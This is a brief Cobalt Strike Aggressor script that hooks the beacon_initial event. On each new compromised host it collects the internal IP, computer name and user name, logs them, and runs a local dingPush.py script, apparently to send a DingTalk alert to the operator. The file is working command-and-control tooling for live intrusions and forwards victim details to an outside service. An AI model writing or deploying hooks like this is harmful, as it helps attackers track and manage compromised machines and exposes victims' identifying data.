on beacon_initial {
    elog("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
    local('$internalIP $computerName $userName');
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $cmd = 'python3 /opt/CobaltStrikeClient/csplugins/dingPush/dingPush.py' . ' --computername ' . $computerName . ' --internalip ' . $internalIP . ' --username ' . $userName;
    elog("Sending dingding Notification: " . $cmd);
    exec($cmd);
}
